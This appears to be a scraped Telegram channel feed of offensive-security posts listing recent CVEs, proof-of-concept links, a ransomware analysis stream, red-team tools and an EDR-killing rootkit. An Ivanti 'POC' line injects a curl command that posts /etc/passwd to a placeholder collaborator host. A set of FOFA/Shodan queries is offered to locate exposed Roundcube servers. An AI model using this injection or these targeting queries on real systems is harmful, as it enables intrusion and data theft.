reconcore

CVE-2025-31650
Apache Tomcat ver 10.1.39
DOS exploit
#cve #tomcat #pentest
🦅 @reconcore

316 views16:34

CVE-2025-49113 – Authenticated RCE in Roundcube via unsafe deserialization in upload.php
poc exploit
Query:

FOFA: app="roundcube"
ZoomEye: app="RoundCube Webmail"
HUNTER: product.name="Roundcube Webmail"
FOFA: product="roundcube"
SHODAN: title:"Roundcube Webmail"

#cve #poc #exploit #pentest
🦅 @reconcore

347 views18:21

reconcore

Beginner Malware Analysis : Babuk Ransomware with IDA Pro (Stream - 13/05/2025)

YouTube

Beginner Malware Analysis: Babuk Ransomware with IDA Pro (Stream - 13/05/2025)

In this beginner malware analysis stream, we reverse engineered a Babuk Ransomware variant with IDA Pro. We analyzed its command-line parsing, service termination, process termination, anti-recovery commands, file encryption, share encryption, and manually…

343 views20:19

reconcore

CVE-2025-49113
Roundcube ≤ 1.6.10
Post-Auth RCE
ALL in ONE (roundcube in docker + POC)
#cve #auth #rce 🦅 @reconcore

333 views21:10

reconcore

CVE-2025-32756
Fortinet RCE (FortiVoice, FortiMail, FortiNDR, FortiRecorder, FortiCamera)
#cve #rce #forinet 🦅 @reconcore

319 views06:36

reconcore

0:09

This media is not supported in your browser

VIEW IN TELEGRAM

#error reconcore

2❤‍🔥1

332 views08:52

reconcore

GitHub

GitHub - louay-075/CVE-2025-49223-BillboardJS-PoC: CVE-2025-49223 - Prototype Pollution in Billboard.js

CVE-2025-49223 - Prototype Pollution in Billboard.js - louay-075/CVE-2025-49223-BillboardJS-PoC

CVE-2025-49223:
Prototype Pollution in Billboard.js
#cve @reconcore

344 views09:35

reconcore

Sean Heelan's Blog

How I used o3 to find CVE-2025-37899, a remote zeroday vulnerability in the Linux kernel’s SMB implementation

In this post I’ll show you how I found a zeroday vulnerability in the Linux kernel using OpenAI’s o3 model. I found the vulnerability with nothing more complicated than the o3 API &#821…

CVE-2025-37899:
Linux kernel SMB 0-Day
#cve #linux #kernel #smb #zeroday @reconcore

336 views09:35

reconcore

CVE-2025-20188:
Cisco IOS XE WLC Arbitrary File Upload Vulnerability
#cve #cisco @reconcore

Horizon3.ai

Cisco IOS XE WLC File Upload Vuln CVE-2025-20188

Explore how a hard-coded JWT in Cisco IOS XE WLC enables unauthenticated file upload and potential RCE—and how to mitigate it.

373 views09:35

reconcore

Practical Incident Response - Active Directory

300 views07:49

reconcore

bloodhound-quickwin

Простой скрипт для извлечения полезных данных из Neo4j базы, которую использует Bloodhound
Наглядно выводит информацию в консоль, коротко и по делу

python3 bhqc.py -h
python3 bhqc.py -p passwordNeo4JHere -d domain.local --heavy

#redteam #bloodhound #soft #python @reconcore

310 views08:05

reconcore

2:11

This media is not supported in your browser

VIEW IN TELEGRAM

System Bus Radio — история о том, как исследователь AM-волны вещал через компьютер 🐱

Некоторые компьютеры намеренно отключены от остального мира. Это включает в себя удаление их доступа к Интернету, беспроводной связи, Bluetooth, USB, внешнему хранилищу файлов и аудио. Это называется «воздушный зазор».

Но даже в такой ситуации ваши данные могут утечь!

Эта программа запускает на компьютере процессы, вызывающие электромагнитное излучение. Излучения имеют широкий частотный диапазон. Притом мощности сигнала уже сейчас хватает, чтобы «перебороть» экранирование и вещать вовне, пусть пока на весьма незначительное расстояние (порядка двух метров).

Таким образом эта программа может передавать секретные данные с компьютера через АМ-радиоволны и кто-то может удаленно принимать сигнал с помощью SDR-приемника.

#SDR #AM @reconcore

307 views08:06

reconcore

Tdesktop - это полный исходный код с инструкцией по сборке официального настольного клиента мессенджера Telegram, основанного на Telegram API и безопасном протоколе MTProto.
#telegram #opensource @reconcore

349 views08:06

reconcore

Wi-Fi-Flash-Drive - pseudo-USB-накопитель, который получает данные с PC по Wi-Fi (на базе ESP32-S2)
#wifi #fakewifi #esp @reconcore

354 views08:06

reconcore

Ivanti Decrypt Stored SQL
POC

https :// [ivanti-ip/domain]/api/v1/license/keys-status/;curl -X POST -d @/etc/passwd oastify[.]xxxxx

Cyber Security News

Ivanti Workspace Control Vulnerabilities Let Attackers Decrypt Stored SQL Credentials

Ivanti has issued urgent security updates for its Workspace Control platform after discovering three high-severity vulnerabilities that could allow attackers to decrypt stored SQL credentials.

334 views09:46

reconcore

0:28

This media is not supported in your browser

VIEW IN TELEGRAM

Kill EDR Processes permanently
user-mode code and its rootkit
dark-kill

341 views10:50

reconcore

CVE-2025-33073: Reflective Kerberos Relay (LPE)
Blog
Patched: June 10, 2025
Интересная LPE с релеем на себя... Даже CVE есть)
#lpe #ad #relay #pentest #redteam

RedTeam Pentesting - Blog

A Look in the Mirror - The Reflective Kerberos Relay Attack

It is a sad truth in IT security that some vulnerabilities never quite want to die and time and time again, vulnerabilities that have long been fixed get revived and come right back at you. While researching relay attacks, the bane of Active …

336 views10:50

reconcore

cve 2025-47934 spoofing openpgp-js-signatures

323 views10:50

reconcore

Red Team Gold: Extracting Credentials from MDT Shares

375 views09:27

reconcore

Analysis of the Kimsuky Group